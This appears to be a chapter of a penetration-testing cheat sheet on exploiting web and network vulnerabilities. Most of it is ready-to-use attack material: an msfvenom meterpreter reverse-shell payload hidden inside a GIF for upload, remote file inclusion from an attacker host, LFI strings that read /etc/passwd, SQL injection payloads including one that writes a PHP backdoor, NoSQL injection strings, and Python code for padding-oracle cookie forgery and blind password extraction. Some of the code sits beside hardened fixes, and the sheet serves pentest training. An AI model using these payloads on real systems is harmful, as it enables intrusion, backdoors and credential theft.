Chapter 3 - Exploiting Vulnerabilities
That was the division in the hacking world: There were people who were exploring it and the people who were trying to make money from it. And, generally, you stayed away from anyone who was trying to make money from it.
— Jeff Moss
Finding Exploits
Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i local
Search Google
Google> site:exploit-db.com exploit kernel <= 3
Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*
Search Vulners
Compiling Exploits
Compile for Windows
# mingw-w64 cross compiler (older Kali images shipped i586-mingw32msvc-gcc instead)
Kali> i686-w64-mingw32-gcc exploit.c -lws2_32 -o exploit.exe
Kali> x86_64-w64-mingw32-gcc exploit.c -lws2_32 -o exploit64.exe
Compile for Architectures
Kali> gcc -m32 -o output32 hello.c   # 32 bit (needs gcc-multilib on a 64-bit host)
Kali> gcc -m64 -o output hello.c     # 64 bit
Breaking out of Virtualization
WebSockets
IPV6
HTTP
Resources
Cracking the Lens: Targeting HTTP's Hidden Attack-Surface
How I hacked hundreds of companies through their helpdesk
Headers
Spoof the client IP
# Only works when the app trusts X-Forwarded-For from anyone; X-Real-IP, X-Originating-IP and X-Client-IP are worth trying too
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
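Why the curl above works, and what the server-side fix looks like. This is an added example, not code from the original page: the addresses, the trusted-proxy set and the "internal" range are all constructed, and the two functions stand in for whatever the target app uses to pick the client address.

```python
import ipaddress

# Constructed topology: 10.0.0.2 is our only reverse proxy, 192.168.1.0/24 is
# what the application treats as "internal", 203.0.113.9 is the attacker.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}
INTERNAL = ipaddress.ip_network("192.168.1.0/24")


def parse_xff(value):
    """Split 'a, b, c' into ip_address objects, left to right; junk is dropped."""
    out = []
    for part in value.split(","):
        try:
            out.append(ipaddress.ip_address(part.strip()))
        except ValueError:
            pass
    return out


def client_ip_naive(headers, remote_addr):
    """Vulnerable: take the leftmost X-Forwarded-For entry, whoever wrote it."""
    chain = parse_xff(headers.get("X-Forwarded-For", ""))
    return chain[0] if chain else ipaddress.ip_address(remote_addr)


def client_ip_hardened(headers, remote_addr, trusted=TRUSTED_PROXIES):
    """Walk the chain from the right, skipping hops we operate; the first hop we
    do not trust is the client. A direct connection ignores the header entirely."""
    hops = parse_xff(headers.get("X-Forwarded-For", "")) + [ipaddress.ip_address(remote_addr)]
    for hop in reversed(hops):
        if hop not in trusted:
            return hop
    return hops[-1]


def is_internal(ip):
    return ip in INTERNAL


if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "192.168.1.1"}   # the header the curl above sends
    for name, fn in (("naive", client_ip_naive), ("hardened", client_ip_hardened)):
        ip = fn(spoof, "203.0.113.9")             # attacker connecting directly
        print(f"{name:8}: {ip}  internal={is_internal(ip)}")
```

The naive version lets the spoofed 192.168.1.1 pass an internal-only check; the hardened version only honours the header when the TCP peer is a proxy we run, and then takes the rightmost address that proxy did not append itself.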
XXE
Resources
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS
Resources
XSS Attack: Busting browsers to root
CORS
Resources
CSRF
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
SSRF
Resources
What is Server side Request Forgery?
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Example
Sometimes what looks like RFI is really SSRF: the server fetches whatever URL it is handed. These commands help map what it can reach.
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
RCE
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
API
Resources
LFI
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
# then send the PHP code to run as the POST body
expect://whoami
# only works when the expect extension is loaded, which is rare
Open Redirects
Resources
RFI
# needs allow_url_include=On on the target (off by default)
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Padding Oracle Attack
Resources
Automated Padding Oracle Attacks with Padbuster
Arguments
url - first argument is the URL
encrypted - second argument is the encrypted sample (the cookie or parameter value)
blocksize - third argument is the block size in bytes (8 for DES/3DES, 16 for AES)
-cookies - cookie(s) to send with every request
-plaintext - plaintext to encrypt; forges a new ciphertext instead of decrypting the sample
Examples
# decrypt the cookie
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8 -cookies "ENC-COOKIE"
# forge a cookie for chosen plaintext
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8 -cookies "ENC-COOKIE" -plaintext '{"user":"admin","role":"admin"}'
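What padBuster does under the hood, as an added example that is not part of the original page or of PadBuster. The block cipher is a constructed toy Feistel permutation standing in for DES/AES (block size 8, the "8" passed above); the attack never looks at the cipher, only at CBC chaining and the PKCS#7 padding check, which is why the same code works against any block cipher. The key, IV and the JSON cookie values are assumptions.

```python
import hashlib

BLOCK = 8  # bytes per block, the "8" handed to padBuster above


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]


def toy_encrypt_block(key, block):
    """Constructed 4-round Feistel stand-in for a real block cipher."""
    l, r = block[:4], block[4:]
    for i in range(4):
        l, r = r, xor(l, _f(key, i, r))
    return l + r


def toy_decrypt_block(key, block):
    l, r = block[:4], block[4:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable error is the whole leak
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    data, prev, out = pad(plaintext), iv, b""
    for i in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, xor(data[i:i + BLOCK], prev))
        out += prev
    return iv + out


def cbc_decrypt(key, data):
    prev, out = data[:BLOCK], b""
    for i in range(BLOCK, len(data), BLOCK):
        out += xor(toy_decrypt_block(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return unpad(out)


def make_oracle(key):
    def oracle(data):  # the server: attacker only learns padding ok / not ok
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False
    return oracle


def attack_block(oracle, prev, target):
    """Recover D_k(target) one byte at a time, then XOR with the previous block."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos                     # padding value being forced
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padv        # known tail now decrypts to padv
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:               # rule out an accidental 02 02 / 03 03 03 hit
                forged[pos - 1] ^= 0xFF
                ok = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 0xFF
                if not ok:
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            raise RuntimeError("oracle never accepted a byte")
    return xor(bytes(inter), prev)


def padding_oracle_decrypt(oracle, data):
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    plain = b"".join(attack_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return unpad(plain)


def padding_oracle_encrypt(oracle, plaintext):
    """The -plaintext mode: forge a ciphertext for chosen text with no key, working backwards."""
    data = pad(plaintext)
    cur = bytes(BLOCK)                         # the last block can be anything
    out = cur
    for i in range(len(data) - BLOCK, -1, -BLOCK):
        inter = attack_block(oracle, bytes(BLOCK), cur)  # prev=0 returns D_k(cur) itself
        cur = xor(inter, data[i:i + BLOCK])
        out = cur + out
    return out
```

Decrypting costs at most 256 oracle queries per byte; forging costs the same, because each ciphertext block is chosen so that D_k of the following block XORs to the wanted plaintext. The false-positive check on the last byte matters: a guess that happens to produce `02 02` also passes the padding check, and skipping the check silently corrupts the byte.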
AWS
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
File Upload
Make a backdoor GIF
# Prepend the magic bytes of a valid image so a signature check passes, and send a
# matching Content-Type (image/gif), since upload handlers often check both.
Kali> msfvenom --list payloads | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
# GIF89a header (47 49 46 38 39 61); use FFD8FFE0 for a .jpg instead
Kali> echo "474946383961" | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST -F "field1=test" \
      -F "file=@/home/user/evil.gif;type=image/gif" \
      --cookie "NAME=VALUE" http://$TARGET/upload.php
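The whole procedure in one place, as an added example that is not from the original page: build the GIF/PHP polyglot, run it past a naive upload check of the kind the note above is aimed at, see a stricter check reject it, and hand-build the multipart body so the per-part Content-Type is explicit (what `-F "file=@evil.gif;type=image/gif"` does for you). The payload is a harmless `phpinfo()` stand-in for the msfvenom output, and both validators are constructed to mirror typical upload.php logic rather than any specific app.

```python
import secrets
import struct

GIF_MAGIC = b"GIF89a"                 # 47 49 46 38 39 61
JPEG_MAGIC = b"\xff\xd8\xff\xe0"      # FF D8 FF E0
MAGIC_BY_EXT = {"gif": GIF_MAGIC, "jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC}
# Constructed header-only 1x1 GIF: magic, logical screen descriptor, trailer.
MINIMAL_GIF = GIF_MAGIC + struct.pack("<HHBBB", 1, 1, 0, 0, 0) + b";"


def make_polyglot(php_code, magic=GIF_MAGIC):
    """Prepend image magic to the backdoor, which is what 'cat evil.php >> evil.gif' does."""
    return magic + b"\n" + php_code


def naive_validate(filename, content_type, data):
    """What a typical upload.php checks: extension, declared MIME type, magic bytes."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return (ext in MAGIC_BY_EXT and content_type.startswith("image/")
            and data.startswith(MAGIC_BY_EXT[ext]))


def strict_validate(filename, content_type, data):
    """GIF only: demand real GIF structure and refuse a PHP open tag anywhere in the file."""
    if not naive_validate(filename, content_type, data) or not data.startswith((b"GIF87a", b"GIF89a")):
        return False
    if len(data) < 14 or data[-1:] != b";":   # header + screen descriptor + trailer
        return False
    width, height = struct.unpack("<HH", data[6:10])
    return width > 0 and height > 0 and b"<?" not in data


def build_multipart(fields, file_field, filename, content_type, data, boundary=None):
    """Hand-built multipart/form-data so the per-part Content-Type is ours to set."""
    boundary = boundary or "----pentest" + secrets.token_hex(8)
    body = b""
    for name, value in fields.items():
        body += (f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n"
                 f"{value}\r\n").encode()
    body += (f"--{boundary}\r\nContent-Disposition: form-data; name=\"{file_field}\"; "
             f"filename=\"{filename}\"\r\nContent-Type: {content_type}\r\n\r\n").encode()
    body += data + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


if __name__ == "__main__":
    poly = make_polyglot(b"<?php phpinfo(); ?>")
    print("naive :", naive_validate("evil.gif", "image/gif", poly))
    print("strict:", strict_validate("evil.gif", "image/gif", poly))
    body, ctype = build_multipart({"field1": "test"}, "file", "evil.gif", "image/gif", poly)
    print(ctype, len(body), "bytes")
```

Even the strict check is only a filter: it would still accept an SVG or `.htaccess` trick it does not model, and structure checks can always be satisfied by a more careful polyglot. The fix that actually holds is re-encoding the image server-side, storing it under a random name outside the web root and never serving uploads through the PHP handler.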
Resources
How to Bypass E-Mail gateways using common payloads
iSCSI
Resources
An interesting route to domain admin via iSCSI
Databases
MySQL
Resources
SQLMap tricks for advanced SQL injection
Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
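How the payloads above land on a query, as an added example that is not part of the original page. It uses an in-memory SQLite table standing in for the MySQL backend (the string-splicing bug is identical; note that SQLite only honours `--` comments, so the `#` variants above are MySQL-only, and `load_file`/`into outfile` are MySQL-only too). The users, passwords and the shape of the login and search queries are constructed.

```python
import sqlite3


def setup():
    """Constructed users table in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                   [("admin", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return db


def login_vulnerable(db, username, password):
    """Vulnerable: user input is spliced into the SQL text."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Fixed: the same query with bound parameters; quotes and comments are just data."""
    return db.execute("SELECT username, role FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()


def search_vulnerable(db, term):
    """A three-column search, the kind of query a UNION payload piggybacks on."""
    return db.execute(f"SELECT id, username, role FROM users WHERE username LIKE '%{term}%'").fetchall()


def find_column_count(db, max_cols=10):
    """The 'AND 1=2 UNION SELECT 1,2,3,...' probe: add columns until the DB stops complaining."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(db, f"' AND 1=2 UNION SELECT {cols}-- ")
            return n
        except sqlite3.OperationalError:   # column-count mismatch between the two SELECTs
            continue
    return None


def dump_passwords(db):
    """With the column count known, swap the numbers for the columns you actually want."""
    rows = search_vulnerable(db, "' AND 1=2 UNION SELECT id, username, password FROM users-- ")
    return sorted(rows)


if __name__ == "__main__":
    db = setup()
    print("admin'--      ->", login_vulnerable(db, "admin'--", "wrong"))
    print("' OR '1'='1   ->", login_vulnerable(db, "x' OR '1'='1", "x' OR '1'='1"))
    print("parameterised ->", login_safe(db, "admin'--", "wrong"))
    print("columns:", find_column_count(db), "dump:", dump_passwords(db))
```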
MSSQL
Resources
SQL Injection Cheatsheet MSSQL
MongoDB
Resources
Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
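The operator payloads above (`{ $ne: 1 }`, `{$gt: ''}`, `[$ne]=1`) work because a JSON or qs-parsed body can smuggle an object where the app expects a string. This added example, not from the original page, models that with a constructed user list and just enough of the Mongo matcher to run offline: it shows the Express-style `password[$ne]=1` parse, a vulnerable login beside the type-checked fix, and a blind `$regex` extraction, which is the operator-form of the `this.password.match(/.*/)` trick listed above. The collection contents and the login query shape are assumptions.

```python
import re
import string
from urllib.parse import parse_qsl

# Constructed collection; the real app would call db.users.findOne(filter).
USERS = [{"username": "admin", "password": "s3cret"},
         {"username": "bob", "password": "hunter2"}]


def parse_body(qs):
    """Mimic Express + qs/body-parser: 'password[$ne]=1' -> {'password': {'$ne': '1'}}."""
    out = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            base, sub = key[:-1].split("[", 1)
            out.setdefault(base, {})[sub] = value
        else:
            out[key] = value
    return out


def matches(value, cond):
    """Just enough of Mongo's matcher: equality, $ne, $gt, $regex."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            ok = value != arg
        elif op == "$gt":
            ok = isinstance(value, str) and value > arg
        elif op == "$regex":
            ok = isinstance(value, str) and re.search(arg, value) is not None
        else:
            raise ValueError(f"operator {op} not modelled")
        if not ok:
            return False
    return True


def find_one(filt):
    for doc in USERS:
        if all(matches(doc.get(k), v) for k, v in filt.items()):
            return doc
    return None


def login_vulnerable(body):
    """findOne({username: req.body.username, password: req.body.password}), body passed through untouched."""
    return find_one({"username": body.get("username"), "password": body.get("password")})


def login_safe(body):
    """Same query, but only plain strings may reach the filter; objects are refused."""
    user, pw = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    return find_one({"username": user, "password": pw})


def extract_password(username, alphabet=string.ascii_lowercase + string.digits, max_len=32):
    """Blind extraction through the vulnerable login: grow a ^prefix regex one character at a time."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            body = {"username": username, "password": {"$regex": "^" + re.escape(known + ch)}}
            if login_vulnerable(body) is not None:
                known += ch
                break
        else:
            return known
    return known


if __name__ == "__main__":
    body = parse_body("username=admin&password[$ne]=1")
    print("parsed     :", body)
    print("vulnerable :", login_vulnerable(body))
    print("safe       :", login_safe(body))
    print("extracted  :", extract_password("admin"))
```

Casting to `str` (or rejecting anything that is not a string) before the value reaches the filter is the whole fix for operator injection; it does nothing for the `$where` string payloads above, which need the JavaScript evaluation itself removed.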
PBX
Resources
Introduction to Telephony and PBX
Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -e START-END $TARGET   # -e is the extension range to enumerate, e.g. -e 100-999